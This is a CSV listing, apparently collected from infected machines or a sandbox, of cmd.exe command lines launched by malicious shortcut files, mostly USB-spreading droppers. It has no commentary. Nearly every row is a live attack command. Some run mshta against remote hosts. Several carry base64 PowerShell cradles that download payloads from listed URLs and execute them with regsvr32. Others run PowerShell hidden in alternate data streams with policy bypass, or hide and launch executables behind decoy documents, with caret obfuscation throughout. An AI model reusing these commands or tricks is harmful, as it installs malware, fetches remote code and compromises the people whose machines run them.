"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""Windows"" & type ""8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe"" > ""C:\Users\user\AppData\Local\Temp\8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe"" & start ""Windows"" ""C:\Users\user\AppData\Local\Temp\8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c ren cfsdaacdfawd\*.vbss *.vbs &start \cfsdaacdfawd\aiasfacoafiasksf.vbs&start ၧ䩼2""٤ၴ䒅c⁠Ĺ᪍2D聱mြ䀨%w⃍","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c ren cfsdaacdfawd\*.vbss *.vbs &start \cfsdaacdfawd\aiasfacoafiasksf.vbs&start 徐美霞之子.doc&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c ren cfsdaacdfawd\*.vbss *.vbs &start \cfsdaacdfawd\aiasfacoiaksf.vbs&start 30714694568_006_00007_00000188.pdf&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c s^tar^t Files.bat & ""Files\Files.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c st^art Drive.bat & ""Drive\Emergency Estimate for Clearance of Hill SlidingBig Boulders from Km 395-410 (N-50)(New) 27-09-2017.xls""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c st^art Drive.bat & exp^lorer ""Drive\115.INTERASJUDINET_980L""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c st^art Drive.bat & exp^lorer ""Drive\116.COOVEEDURIA_9802""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c st^art Drive.bat & exp^lorer ""Drive\117.COOPSERVINET_973A""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c st^art Drive.bat & exp^lorer ""Drive\JORGE_PRG3LAB#2""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c st^art Drive.bat & exp^lorer ""Drive\Nueva carpeta de mucica""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c st^art Drive.bat & exp^lorer ""Drive\SABANAS AGOSTO""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start ..\AntiUsbShortCut\AntiUsb.exe ""..\AntiUsbShortCut\AntiUsbShortCut.zip"" & explorer ""..\newcpuspeedcheck"" & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start ..\Microsoft\MicrosoftSecurity.exe /AutoIt3ExecuteScript ..\Microsoft\Microsoft.a3x explorer ChrW(41-4) & String(""C"") & ChrW(68) & ChrW(2+35) & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start ..\MozillaFirefox\GoogleChrome.exe /AutoIt3ExecuteScript ..\MozillaFirefox\GoogleChrome.a3x explorer ChrW(37) & ChrW(84-17) & ChrW(87-19) & ChrW(35+2) & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start ..\Skypee\AutoIt3.exe /AutoIt3ExecuteScript ..\Skypee\googleupdate.a3x explorer ""%CD%"" & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start /b mshta http://edit.wpsonline.co/vdxpUoLpGMUlsHW1ph74K9bpzl3v2faXZIhWHIJoIEo=","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start /b mshta https://edit.wpsonline.co/hdr9VSnBo8SUb0aXd4xXXoG9w+dTjc90QM9hNhcQ4zo=","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start /b mshta https://www.googlesheet.info/XuB4bGC2ER7yBOlrTrN1BgtZiuzBvxppDoRfB5XkAqk=","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start /b mshta https://www.googlesheet.info/x5DXrqE8Xdy9MxDssmtrp6WtaJc+YNoWUVxY5Ca4i4M=","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start 1.bat & "".Trashes\Acta Nac Gaby.pdf""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start 1.bat & "".Trashes\Resumen Morales 2020.doc.docx""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start 3f6114f434724860ddd95dd9f09b1c95.exe&start icuin63.dll & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start 46468843.exe&start 8867123.exe & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start 46468843.exe&start event-stream.dll & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start 532c40623a061d02e790505a4521fe91.exe&start 81e4190ccbe512db5eedb3737c534e41.exe & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start 79535094.exe&start event-stream.dll & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start 81e4190ccbe512db5eedb3737c534e41.exe&start 34216c75b880cec48bb5b3f8fabdb7f1.exe & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start 8867123.exe&start 46468843.exe & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start 8ab58ed50481b225d9a52b8cbdb2299c.exe&explorer /root,""%CD%Новый мир---------"" & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start BronCoder.wsf&start Manuel.doc&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start C:\GoogleChrome\GoogleChrome.exe C:\GoogleChrome\GoogleChrome.a3x & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start C:\Google\executable.exe & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start CRM"" """" ""Master"" ""LLC"" ""rate"" ""Egypt"" ""Afghanistan"" ""BD"" ""PAK"" ""NON"" ""CLI"" ""Route.wsf&start mickey"" ""042.jpg&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start Drive.bat & ""Drive\GetImage.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start Drive.bat & ""Drive\India.pptx""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start Drive.bat & explorer ""Drive\203-2020 PRIMER AUDIENCIA""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start Drive.bat & explorer ""Drive\The Conjuring The Devil Made Me Do It (2021) [720p] [WEBRip] [YTS.MX]""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start Drive.bat & explorer ""Drive\found.000""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start F:\SystemVolumeInformation.exe&start TypingMaster.exe &exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start F:\SystemVolumeInformation.exe&start tmaster.exe &exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start FOR"" ""PAK"" ""NCL"" ""live"" ""traffic"" ""Cuba"" ""Ethopia"" ""Napal"" ""Spice"" ""Srilanka"" """" ""Bd"" ""CLI"" ""Pak"" ""NCL"" ""Bangladesh.wSf&start explorer Mp3&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start HP2.exe","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start HPScan.exe","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start HPScanDisco.exe","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start INFORME"" ""GESTION"" ""ARMAMENTO"" ""SV."" ""CORDOBA.doc&#115;&#116;&#97;&#114;&#116;&#32;&#65;&#76;&#85;&#77;&#78;&#73;&#46;&start rad9A292.tmp.gpast.vbs&#115;&#99;&#114 &"" &exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start USB.exe&start NumifyV4_Cracked"" ""[Crax.Pro"" ""-"" ""Crax.Tube].rar & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start USB.exe&start UITLEG.txt & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start app.vbe&start explorer DCIM&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start bctpwwgtte..vbs&start 正方形PPT课件.ppt&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start bctpwwgtte..vbs&start 王子怡论文答辩.ppt.pptx&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start d91f93b5eba9952f9d2d931f1f371df0.exe&explorer /root,""%CD%S5 FPS Boost Registry Files Revert Pack"" & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start gsvchost.exe.vbs&start explorer MozillaFirefox&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start rundll32  \aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,UAMMMMMYYYkkkwwM","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start rundll32  \addaddadddadadaaaadaaadadaaddadaaadddaaaaddddddadddddad.addaddadddadadaaaadaaadadaaddadaaadddaaaaddddddadddddad,GTaYfmbZDKRYWLby","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start rundll32  \caeaaceaceccaeaaeaceeaceaccceaeaccaaceacaaeacaceacecacaea.caeaaceaceccaeaaeaceeaceaccceaeaccaaceacaaeacaceacecacaea,CAIUgsAMYksEQgMU","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start rundll32  \cbbfeecbfeecbbfecbfeecbbffeeccbffeccbbfeecbbffeccbfefc.cbbfeecbfeecbbfecbfeecbbffeeccbffeccbbfeecbbffeccbfefc,LieZVQMSNJEAvrcr","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start rundll32  \cceceaaccaeeceaeaeecaeceeaeaeececceaeccaeecaaeaeceaecac.cceceaaccaeeceaeaeecaeceeaeaeececceaeccaeecaaeaeceaecac,XjvLbrDTjzLfvXzn","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start rundll32  \eaaaeaaceececceaeeaeaceacccacecaecececaeaacceae.eaaaeaaceececceaeeaeaceacccacecaecececaeaacceae,QGqeiCeSOSOaeaWq","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start rundll32  \fbdfbbddfddbbdbdfddbfbdfbddfbdfdfbbd.fbdfbbddfddbbdbdfddbfbdfbddfbdfdfbbd,HlJnT1V7rT9lV7r9","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start rundll32  \fdefdfddfaeefffaeadfadeffadfdeddffdefaefaaeeadefdeaeafe.fdefdfddfaeefffaeadfadeffadfdeddffdefaefaaeeadefdeaeafe,sleH3ugJ5wpSEkW4","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start start.bat","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start start.vbs","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start tmp4E8B.tmp.js&start tmp70DA.tmp.vbs&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start win1.vbs&start 沈阳居民楼插排电源火灾没有人员死亡.jpg&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start windows_api.bat&start BOOTEX.LOG&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start windows_api.bat&start New"" ""Microsoft"" ""Office"" ""Word"" ""Document.docx&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start windows_api.bat&start الأشكال"" ""الهندسية-رياض"" ""الجنة-"" ""أبيض"" ""و"" ""أسود.pdf&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start wscript "".Trashes\504\dfuxck.js"" & "".Trashes\NS N° 003-14 a IR N° 018-10 Cumaribo - Vichada.pdf""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start wscript "".Trashes\598\tgwrryyi.js"" & "".Trashes\CEDULAS 5-C-2016 PARTE 5.jpg""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start wscript "".Trashes\894\atobdkqdf.js"" & explorer "".Trashes\1. FORMATOS OFICIOS Y ENTERADOS JUL 2015""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start wscript "".Trashes\894\atobdkqdf.js"" & explorer "".Trashes\2. FORMATOS DE ARCHIVO OJOOOO JUL 2015""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start wscript /e:VBScript.Encode Manuel.doc & start explorer ASLAF"" ""2021 & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start wscript /e:VBScript.Encode Manuel.doc & start explorer Android & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start wscript /e:VBScript.Encode Manuel.doc & start explorer ZEPHYR"" ""VENTURE & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start wscript /e:VBScript.Encode Manuel.doc & start explorer cosas"" ""para"" ""otro"" ""pc"" ""traspàso & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start wscript /e:VBScript.Encode Manuel.doc & start y2mate.com"" ""-"" ""kettiyolaanu_ente_malakha_2019_malayalam_full_movie_ljBHP5DJwV4_360p.mp4 & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c wscript "".Trashes\582\svtsrslf.js"" & "".Trashes\ESTADISTICA JULIO 2015.xls""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c wscript "".Trashes\697\jpogxccft.js"" & "".Trashes\Documentos.pdf""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /k ""more < account.pdf.lnk:s.ps1 | p^o^w^e^r^s^h^e^l^l^.^e^x^e -W 1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /k ""more < account.pdf.lnk:s.ps1 | p^o^wershell.exe -W 1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /k ""more < account.pdf.lnk:s.ps1 | powershell.exe -W 1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /k ""more < account.pdf.lnk:s.ps1 | powershell.exe -ep b\y\p\a\s\s -NoP -NonI -W 1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /q /X /d /rtYpE QJm.BMP|cMD","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /q /c c^o^py C:\Windows\system32\msh*.exe C:\Users\Public\* & for %i IN (C:\Users\Public\ms*.exe) DO start /b %~ni.exe ""https://wps.wpsonline.co/MWYmcR2APzEhbhFDlUZ6CPv7kvGY6HSwhrGYMdLvQug=""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /q /c c^o^py C:\Windows\system32\msh*.exe C:\Users\Public\* & for %i IN (C:\Users\Public\ms*.exe) DO start /b %~ni.exe ""https://wps.wpsonline.co/NycPUscrBDRtwgLAh+SKeYCp+3i2aTQY4Rmc4PL9+0Q=""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /v /c s^t^a^r^t e^x^p^l^o^r^e^r 321.txt && i^f n^o^t e^x^i^s^t C:\U^s^e^r^s\Pu^bl""i""c\sv^ho^st^s.exe echo ,,,""P""o^wer^s""h""""e""""l""""l"" -N""o""nI -W Hi^dd^en -N""o""P -E""x""ec B^y^p^a^s^s -""E""nc^od""e""dCo^mm^an^d S""QB""FA""Fg""AI""AA""oA""E4""AZ""QB""3A""C0""AT""wB""iA""Go""AZ""QB""jA""HQ""AI""AB""OA""GU""Ad""AA""uA""Fc""AZ""QB""iA""EM""Ab""AB""pA""GU""Ab""gB""0A""Ck""AL""gB""EA""G8""Ad""wB""uA""Gw""Ab""wB""hA""GQ""AR""gB""pA""Gw""AZ""QA""oA""Cc""Aa""AB""0A""HQ""Ac""AA""6A""C8""AL""wA""xA""DI""AN""wA""uA""DA""AL""gA""wA""C4""AM""QA""vA""HA""Ad""QB""0A""HQ""Ae""QA""uA""GU""Ae""AB""lA""Cc""AI""AA""sA""CA""AJ""wB""DA""Do""AX""AB""VA""HM""AZ""QB""yA""HM""AX""AB""QA""HU""AY""gB""sA""Gk""AY""wB""cA""GM""Ab""QB""kA""C4""AZ""QB""4A""GU""AJ""wA""pA""Ds""AI""AB""TA""HQ""AY""QB""yA""HQ""AL""QB""QA""HI""Ab""wB""jA""GU""Ac""wB""zA""CA""AQ""wA""6A""Fw""AV""QB""zA""GU""Ac""gB""zA""Fw""AU""AB""1A""GI""Ab""AB""pA""GM""AX""AB""jA""G0""AZ""AA""uA""GU""Ae""AB""lA""Ds""AI""AB""hA""HQ""Ad""AB""yA""Gk""AY""gA""gA""C0""AS""AA""gA""DE""AL""gB""iA""GE""Ad""AA""7A""CA""AU""gB""lA""G0""Ab""wB""2A""GU""AL""QB""JA""HQ""AZ""QB""tA""CA""AM""QA""uA""GI""AY""QB""0A""A=""= >%cd%\1.bat && attrib +h %cd%\1.bat && echo | s^t^a^r^t /min ,,,c""m""d /c 1.b""a""t","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /v:on /c ANj0+W5SNRTQOnIsMu4p/Fx9Ffak91vyYYxMj/z/Bm0bwXQoEc50p2xPylYU7+HJ1b8pWs/r||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c ""&{ iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('ICAgICBXcml0ZS1Ib3N0ICJVTFVrWiI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly9qYXJjZS5jbC9FLXRpc2FsYXRfRWJpbGwtUC85UjNXeEtMLyIsImh0dHBzOi8vamdtc21ldHIuY29tL2FwcGxpY2F0aW9uL1I1aVEwMFBtTnYyLyIsImh0dHA6Ly9qYXBsYXRlYy5jb20vcGFnZS9zQW5mcHRUTjBKNHB3NFM2QjFZLyIsImh0dHA6Ly9qYmh5ZHJvc2VlZC5jb20uYXUvY2dpLWJpbi9JMHlSOFpwNnN4NjRCT0MvIiwiaHR0cDovL3d3dy5pbmVsbXN1ci5jb20uZWMvd3AtY29udGVudC9JTUtIY0tPYWMyUEpURi8iLCJodHRwOi8vamVzdHRlZXNuLmNvbS9ZeG1JejRTblIwRTZkQ2lOL0NoaGl0VlZQb2dlaU0vIik7JHQ9ImZaZW5oIjtta2RpciAtZm9yY2UgIiRlbnY6VE1QXC4uXCR0IiB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRlbnY6VE1QXC4uXCR0XHNRdVVVRGJnZ3guV1RNO1JlZ3N2cjMyLmV4ZSAiJGVudjpUTVBcLi5cJHRcc1F1VVVEYmdneC5XVE0iO2JyZWFrfSBjYXRjaCB7IH19'))) }""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /v:on /c Z5Mx5xzuFwyBncJRH83ACEKuvFcuNKrEMRrV5JLGH3gB5kq39MQKgbLZrescGokpXmFwhr19||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c ""&{ iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('ICAgICBXcml0ZS1Ib3N0ICJVTFVrWiI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly9qYXJjZS5jbC9FLXRpc2FsYXRfRWJpbGwtUC85UjNXeEtMLyIsImh0dHBzOi8vamdtc21ldHIuY29tL2FwcGxpY2F0aW9uL1I1aVEwMFBtTnYyLyIsImh0dHA6Ly9qYXBsYXRlYy5jb20vcGFnZS9zQW5mcHRUTjBKNHB3NFM2QjFZLyIsImh0dHA6Ly9qYmh5ZHJvc2VlZC5jb20uYXUvY2dpLWJpbi9JMHlSOFpwNnN4NjRCT0MvIiwiaHR0cDovL3d3dy5pbmVsbXN1ci5jb20uZWMvd3AtY29udGVudC9JTUtIY0tPYWMyUEpURi8iLCJodHRwOi8vamVzdHRlZXNuLmNvbS9ZeG1JejRTblIwRTZkQ2lOL0NoaGl0VlZQb2dlaU0vIik7JHQ9ImZaZW5oIjtta2RpciAtZm9yY2UgIiRlbnY6VE1QXC4uXCR0IiB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRlbnY6VE1QXC4uXCR0XHNRdVVVRGJnZ3guV1RNO1JlZ3N2cjMyLmV4ZSAiJGVudjpUTVBcLi5cJHRcc1F1VVVEYmdneC5XVE0iO2JyZWFrfSBjYXRjaCB7IH19'))) }""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /v:on /c zawTBVYX5rrXz1qGXQTqoUEh3+aQCRDXu9eSyNk9YS7aLdyXambM/DzwwCWt+DvW56ofYx+0||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c ""&{$Br='ICAgICAgIFdyaXRlLUhvc3QgInVQTlNJIjskUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vd3d3LmpwcmFydHMuY29tL3NzbC9ROFY5NTBIRm01NnlVUG5RaEEvIiwiaHR0cDovL3JlZG1hZy1kei5jb20vam9vbWxhL0s2NnMxSVU5aC8iLCJodHRwOi8vcmV6YS1raGFsYWouY29tL2F3c3RhdHMvd0U2YmN6SWUycC8iLCJodHRwOi8vd3d3Lmpzb25zaW50bC5jb20vUnhzR2dvVld6OS8iLCJodHRwczovL29ycXVlc3RhbWVkaWEuY29tL0ZhY2Vib29rL2x1VXN5a1JrVC8iLCJodHRwOi8vcGlmZmwuY29tL3BpZmZsLmNvbS9SZFMwdWVrNURNZEUwMHkvIik7JHQ9IkloVXlNIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEFNemJmdGl4bkguV05UO1JlZ3N2cjMyLmV4ZSAiJGRcQU16YmZ0aXhuSC5XTlQiO2JyZWFrfSBjYXRjaCB7IH19';$Oh=[System.Convert]::FromBase64String($Br);$Xr=[System.Text.Encoding]::ASCII.GetString($Oh); iex ($Xr)}""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c ""C:\Windows\explorer.exe %cd%5번_메탈로센_PP_전용_중합_반응기 & attrib -s -h %cd%EqafEEM.exe & xcopy /F /S /Q /H /R /Y %cd%EqafEEM.exe C:\Users\user\AppData\Local\Temp\EmCdr\ & attrib +s +h %cd%EqafEEM.exe & start C:\Users\user\AppData\Local\Temp\EmCdr\EqafEEM.exe & exit""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c ""C:\Windows\explorer.exe %cd%订卷用 & attrib -s -h %cd%uHNkACM.exe & xcopy /F /S /Q /H /R /Y %cd%uHNkACM.exe C:\Users\user\AppData\Local\Temp\PolYm\ & attrib +s +h %cd%uHNkACM.exe & start C:\Users\user\AppData\Local\Temp\PolYm\uHNkACM.exe & exit""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c ""start %cd%Kamazz_-_Как_ты_там__(Премьера_клипа_2022).mp3 & attrib -s -h %cd%elgbyrF.exe & xcopy /F /S /Q /H /R /Y %cd%elgbyrF.exe C:\Users\user\AppData\Local\Temp\sYLqF\ & attrib +s +h %cd%elgbyrF.exe & start C:\Users\user\AppData\Local\Temp\sYLqF\elgbyrF.exe & exit""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c ""start %cd%WaterwallSecurityDriveOfficeData.wwsd & attrib -s -h %cd%EqafEEM.exe & xcopy /F /S /Q /H /R /Y %cd%EqafEEM.exe C:\Users\user\AppData\Local\Temp\EmCdr\ & attrib +s +h %cd%EqafEEM.exe & start C:\Users\user\AppData\Local\Temp\EmCdr\EqafEEM.exe & exit""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c ""start %cd%~WRL0003.tmp & attrib -s -h %cd%GolQEWo.exe & xcopy /F /S /Q /H /R /Y %cd%GolQEWo.exe C:\Users\user\AppData\Local\Temp\VqLji\ & attrib +s +h %cd%GolQEWo.exe & start C:\Users\user\AppData\Local\Temp\VqLji\GolQEWo.exe & exit""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c ""start %cd%卖小狗.mp4 & attrib -s -h %cd%MagOzyr.exe & xcopy /F /S /Q /H /R /Y %cd%MagOzyr.exe C:\Users\user\AppData\Local\Temp\jnKqK\ & attrib +s +h %cd%MagOzyr.exe & start C:\Users\user\AppData\Local\Temp\jnKqK\MagOzyr.exe & exit""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c ""start %cd%吃饭2.mp4 & attrib -s -h %cd%MagOzyr.exe & xcopy /F /S /Q /H /R /Y %cd%MagOzyr.exe C:\Users\user\AppData\Local\Temp\jnKqK\ & attrib +s +h %cd%MagOzyr.exe & start C:\Users\user\AppData\Local\Temp\jnKqK\MagOzyr.exe & exit""","C:\Users\user\Desktop\",1
